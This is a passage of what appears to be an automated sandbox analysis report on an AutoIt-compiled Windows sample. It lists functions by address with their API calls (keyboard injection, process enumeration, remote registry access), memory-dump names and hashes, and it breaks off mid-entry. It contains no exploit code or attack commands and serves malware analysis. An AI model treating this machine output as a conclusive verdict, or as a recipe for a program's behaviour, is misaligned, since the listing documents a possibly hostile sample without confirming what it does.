                                                                                                                  • Opcode Fuzzy Hash: 5a384ba09bd9194df64896037848493d99d40b223e96484c3f79da4ce3f3fe95
                                                                                                                  • Instruction Fuzzy Hash: A8718A74A006199FCF04EFA5D8819AEBBF5FF48310F508459E956BB3A1CB30AD40CBA4
                                                                                                                  Function 00E23BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetParent.USER32(00000000), ref: 00E23C02
                                                                                                                  • GetKeyboardState.USER32(?), ref: 00E23C17
                                                                                                                  • SetKeyboardState.USER32(?), ref: 00E23C78
                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E23CA4
                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E23CC1
                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E23D05
                                                                                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E23D26
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 87235514-0
                                                                                                                  • Opcode ID: 5563fdad9223407501f0c54a35991d302a7f780fed6218bf56b030aa741fc429
                                                                                                                  • Instruction ID: 303287d2a094a3765c46f3074df9278fc9f11c4444668ed44a0644608ae52661
                                                                                                                  • Opcode Fuzzy Hash: 5563fdad9223407501f0c54a35991d302a7f780fed6218bf56b030aa741fc429
                                                                                                                  • Instruction Fuzzy Hash: 9D510AA06047E53DFB328734DC46B76BF996B06308F0C9489E1D5768C2D698EE94EB60
                                                                                                                  Function 00E48FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00E48FE7
                                                                                                                  • GetWindowLongW.USER32(01089320,000000F0), ref: 00E4901A
                                                                                                                  • GetWindowLongW.USER32(01089320,000000F0), ref: 00E4904F
                                                                                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00E49081
                                                                                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00E490AB
                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00E490BC
                                                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00E490D6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LongWindow$MessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2178440468-0
                                                                                                                  • Opcode ID: 80c1fa923a17a6ed43e182f1ac7b4a349a234aa1412aacd4f5f7669f5592cda3
                                                                                                                  • Instruction ID: 41956edf7d41a4bfd4c7d245fa528e652cb8d61d1563554d63d9bb9d349cef41
                                                                                                                  • Opcode Fuzzy Hash: 80c1fa923a17a6ed43e182f1ac7b4a349a234aa1412aacd4f5f7669f5592cda3
                                                                                                                  • Instruction Fuzzy Hash: 603134347042149FDB218F59EC84F6A37A5FB8A358F1451A4F619EB2B2CBB1AC44DB41
                                                                                                                  Function 00E208AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E208F2
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E20918
                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00E2091B
                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00E20939
                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00E20942
                                                                                                                  • StringFromGUID2.COMBASE(?,?,00000028), ref: 00E20967
                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00E20975
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3761583154-0
                                                                                                                  • Opcode ID: 20f54b597549bf579d2404cfb55ded334f88a356d7f19ead3eb62bb6189515e8
                                                                                                                  • Instruction ID: 5e75f86635701d072a4c77d92b4d3172e54e866655ff413141dcd7a11678e3f3
                                                                                                                  • Opcode Fuzzy Hash: 20f54b597549bf579d2404cfb55ded334f88a356d7f19ead3eb62bb6189515e8
                                                                                                                  • Instruction Fuzzy Hash: F321C972605218AFDB109F79EC88DBB73ACEF49364B408125F915EB192D670EC45C760
                                                                                                                  Function 00E22472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __wcsnicmp
                                                                                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                  • API String ID: 1038674560-2734436370
                                                                                                                  • Opcode ID: a005ddcc71bc26f530856807605f1c8753e9604ae4adc6987a77c74fec8e413a
                                                                                                                  • Instruction ID: 00f95b63f4ccbc50dfab329ee72b180be626f72b76b3a9dc536b9aa3074475ac
                                                                                                                  • Opcode Fuzzy Hash: a005ddcc71bc26f530856807605f1c8753e9604ae4adc6987a77c74fec8e413a
                                                                                                                  • Instruction Fuzzy Hash: E7216A3124423577C330BA24AD02FB773D9EF64304F54E42EF646B7181E7559982C2B5
                                                                                                                  Function 00E20986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E209CB
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E209F1
                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00E209F4
                                                                                                                  • SysAllocString.OLEAUT32 ref: 00E20A15
                                                                                                                  • SysFreeString.OLEAUT32 ref: 00E20A1E
                                                                                                                  • StringFromGUID2.COMBASE(?,?,00000028), ref: 00E20A38
                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00E20A46
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3761583154-0
                                                                                                                  • Opcode ID: 52e5a6ec2efefacf4028720b17a8a2a31dc4c34a459dff8c1106ec97e7282586
                                                                                                                  • Instruction ID: 3c6012b0a729ea6ff7b156380c800c929dec674148f84ae9cddc830e5ff57b7a
                                                                                                                  • Opcode Fuzzy Hash: 52e5a6ec2efefacf4028720b17a8a2a31dc4c34a459dff8c1106ec97e7282586
                                                                                                                  • Instruction Fuzzy Hash: F6217475604214AFDB109FA9EC88DAB77ECEF483647808125F919EB2A1DAB0EC458764
                                                                                                                  Function 00E4A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DFD1BA
                                                                                                                    • Part of subcall function 00DFD17C: GetStockObject.GDI32(00000011), ref: 00DFD1CE
                                                                                                                    • Part of subcall function 00DFD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DFD1D8
                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00E4A32D
                                                                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00E4A33A
                                                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00E4A345
                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00E4A354
                                                                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00E4A360
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                  • String ID: Msctls_Progress32
                                                                                                                  • API String ID: 1025951953-3636473452
                                                                                                                  • Opcode ID: b06f53ea8ed17b44dbe31328229ebb835e3f3da38f9db7df4ec012c4ff0c3d58
                                                                                                                  • Instruction ID: d14d7f9a797df95308a67155c3f40938ac23ef128c79f0d751eab409163d8a13
                                                                                                                  • Opcode Fuzzy Hash: b06f53ea8ed17b44dbe31328229ebb835e3f3da38f9db7df4ec012c4ff0c3d58
                                                                                                                  • Instruction Fuzzy Hash: 1311D0B1140219BEEF108F61DC85EEB7F6DFF083A8F014114FA08A60A0C672AC21DBA4
                                                                                                                  Function 00DFCCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetClientRect.USER32(?,?), ref: 00DFCCF6
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00DFCD37
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00DFCD5F
                                                                                                                  • GetClientRect.USER32(?,?), ref: 00DFCE8C
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00DFCEA5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Rect$Client$Window$Screen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1296646539-0
                                                                                                                  • Opcode ID: f5f38b4dc89d1b4b857434655ec9efb784e3deedc3b3edc39293b6951c9fed92
                                                                                                                  • Instruction ID: f477bc766899e6def76509ae5ef338a5485f20c2b983a98a8d45761f42aece51
                                                                                                                  • Opcode Fuzzy Hash: f5f38b4dc89d1b4b857434655ec9efb784e3deedc3b3edc39293b6951c9fed92
                                                                                                                  • Instruction Fuzzy Hash: 86B17D7991024DDBDB14CFA8C9807EDB7B1FF08340F15E529ED99AB250DB30AA54CB64
                                                                                                                  Function 00E41BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00E41C18
                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00E41C26
                                                                                                                  • __wsplitpath.LIBCMT ref: 00E41C54
                                                                                                                    • Part of subcall function 00E01DFC: __wsplitpath_helper.LIBCMT ref: 00E01E3C
                                                                                                                  • _wcscat.LIBCMT ref: 00E41C69
                                                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00E41CDF
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00E41CF1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1380811348-0
                                                                                                                  • Opcode ID: 8593c0b1a3b65c49496b23aac635c129ee0b91ef779b0927e23210b3806992f0
                                                                                                                  • Instruction ID: 17330a9c22931e797e32296f8bb4fe17abbfc880eb379645968bb790ddeb3540
                                                                                                                  • Opcode Fuzzy Hash: 8593c0b1a3b65c49496b23aac635c129ee0b91ef779b0927e23210b3806992f0
                                                                                                                  • Instruction Fuzzy Hash: 8A518CB15083449FD720EF25DC85EABB7E8EF88754F00491EF585A7291EB70DA05CBA2
                                                                                                                  Function 00E42FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E43C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E42BB5,?,?), ref: 00E43C1D
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E430AF
                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E430EF
                                                                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00E43112
                                                                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00E4313B
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00E4317E
                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E4318B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3451389628-0
                                                                                                                  • Opcode ID: 449c928a70be871192631b5351ba3c120d3c8f85195cfac8046bb574dad63eeb
                                                                                                                  • Instruction ID: eeedf1d5b2d563df237e3b959ced1a8f893f00eb6c34dfb6cb12d7ad64a924ce
                                                                                                                  • Opcode Fuzzy Hash: 449c928a70be871192631b5351ba3c120d3c8f85195cfac8046bb574dad63eeb
                                                                                                                  • Instruction Fuzzy Hash: 1F515631608340AFC714EF65DC85E6ABBE9FF88304F04491DF545A72A1DB71EA09CBA2
                                                                                                                  Function 00E484DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetMenu.USER32(?), ref: 00E48540
                                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 00E48577
                                                                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00E4859F
                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 00E4860E
                                                                                                                  • GetSubMenu.USER32(?,?), ref: 00E4861C
                                                                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 00E4866D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$Item$CountMessagePostString
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 650687236-0
                                                                                                                  • Opcode ID: 381b128037a6a71ddfcb5631a19d0dfefcfecd7a09625fb85e7bb226fb064a0c
                                                                                                                  • Instruction ID: 3d064291f5cbfafea8a4ea84b5f6ab2b07ee45b919f6cb6f658c70bd41db1d76
                                                                                                                  • Opcode Fuzzy Hash: 381b128037a6a71ddfcb5631a19d0dfefcfecd7a09625fb85e7bb226fb064a0c
                                                                                                                  • Instruction Fuzzy Hash: 1951AE31E00218AFCF11EF65DA41AAEB7F4FF48710F115499E916BB351CB74AE418BA0
                                                                                                                  Function 00E24AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00E24B10
                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E24B5B
                                                                                                                  • IsMenu.USER32(00000000), ref: 00E24B7B
                                                                                                                  • CreatePopupMenu.USER32 ref: 00E24BAF
                                                                                                                  • GetMenuItemCount.USER32(000000FF), ref: 00E24C0D
                                                                                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00E24C3E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3311875123-0
                                                                                                                  • Opcode ID: 6b328018a6dd51e746759531c99bdfece2248ed0b50630de27d04600959fa844
                                                                                                                  • Instruction ID: c22d53833f692f6707319be5de6d2b0c4677a59f6cae853021f9e2d5fdbc6194
                                                                                                                  • Opcode Fuzzy Hash: 6b328018a6dd51e746759531c99bdfece2248ed0b50630de27d04600959fa844
                                                                                                                  • Instruction Fuzzy Hash: A251CFB0A01369EFEF20CF68E889BAEBBF4AF44318F145159E415BB2D1D3B09944CB51
                                                                                                                  Function 00DFABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
                                                                                                                  • BeginPaint.USER32(?,?,?), ref: 00DFAC2A
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00DFAC8E
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00DFACAB
                                                                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00DFACBC
                                                                                                                  • EndPaint.USER32(?,?,?,?,?), ref: 00DFAD06
                                                                                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00E5E673
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
